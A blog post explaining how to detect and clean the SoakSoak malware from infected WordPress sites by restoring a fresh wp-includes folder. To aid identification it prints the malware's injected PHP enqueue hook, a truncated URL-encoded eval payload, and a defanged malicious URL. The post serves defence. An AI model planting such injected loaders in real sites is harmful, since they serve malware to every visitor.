,

How to disinfect website infected from SoakSoak malware

   

Recently over  100,000+ WordPress Websites got infected by SoakSoak malware. In a report by industry leading security expert Sucuri which can be found here it was ascertained that Google has now blacklisted more than 11k+ domains because of the malware campaign from SoakSoak.ru. Though the reasons for sites being vulnerable has not yet been clarified but all of the websites on Inspire2rise network were safe. This is mainly because of adequate security measure and DNS level filtering that has been put into place. So what can you do if you are already infected with this malware. Recently a friend, Harshmeet Singh from RootMyAndroid.org told us about his website being infected and through his experiences we have found quite a few working methods to remove the SoakSoak malware from websites using the WordPress platform. Read on to know more about how to disinfect website infected from SoakSoak malware.

Google has blacklisted SoakSoakru

How to disinfect website infected from SoakSoak malware : Identification.

Firstly you need to identify whether you have been actually infected from the SoakSoak.ru malware or not. To do this you can do two things, first thing is to find some suspicious looking files being served from your website.

The malware modifies the wp-includes/template-loader.php to make it include the following code.

<?php
function FuncQueueObject()
{
 wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This causes another includes file which is wp-includes/js/swobject.js to be included on every page viewed on the site which includes the following malware:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

The malware is a javascript malware from SoakSoak.ru, and contains this file in particular – hxxp://soaksoak.ru/xteas/code

If you find these codes in your pages or you are suspicious whether your site is safe or not then you can use the Free Site Security scanner provided by Sucuri.

See more: How to check and change IP address of PC

How to disinfect website infected from SoakSoak malware : The steps.

Now to disinfect your website from this malware perform the following steps in exact order:

  1. Download the official WordPress zip from WordPress.org here.
  2. Now extract this zip to someplace on your desktop and copy the wp-includes folder.
  3. Login to your hosting account or cpanel and go to file manager, head over to the directory where your site is hosted. Delete the wp-includes folder from there and replace it with the wp-includes that you have now from the fresh zip that you downloaded.
  4. Now clear all existing caches from caching plugins as well as CDN (if you use any CDN solution like MaxCDN, Cloudflare, Google pagespeed etc.)
  5. Check your site again in a browser with cleared caches or incognito window to see if the malware still exists or not.
  6. Once you are done removing the malware it’s time to strengthen your site. Install iThemes security plugin for WordPress and configure it using the below guide written by us – How to secure WordPress.
  7. Using DNS level filtering through services like cloudflare or using a compatible firewall could save you from many future attacks so keep that also in mind.

Now that you know how to secure your website from the SoakSoak malware don’t forget to share this article with your friends or people you know who might be hurt/suffering due to this malware attack. If you have any doubts or questions or want to add any more working method on how to disinfect website infected from SoakSoak malware then feel free to comment below!

Keep visiting for more awesome security articles, WordPress tips and remember we cover, “Everything under the Sun!”

inspire2rise mascots - cowboys

Follow Inspire2rise on Twitter. | Follow Inspire2rise on Facebook. | Follow Inspire2rise on Google+.

Stay Inspired to rise fellas!

Read more:

Written by Aditya Nath Jha

Aditya Nath Jha is an Engineer from New Delhi, India. His areas of interest include Gadgets, WordPress, speed optimization & latest technology.
When he is not busy blogging he loves to write poetry, compose his own songs and has a taste for music! Find me on Facebook, Google +, Twitter, Linked in.
And watch my videos on Youtube.

Comments

Leave a Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Loading…

Facebook Comments

[GUIDE] How to memorialize a Facebook profile or remove it

How to memorialize a Facebook profile of deceased person?

Android lollipop arrives for Moto G 2013 GPE

Android lollipop arrives for Moto G 2013 GPE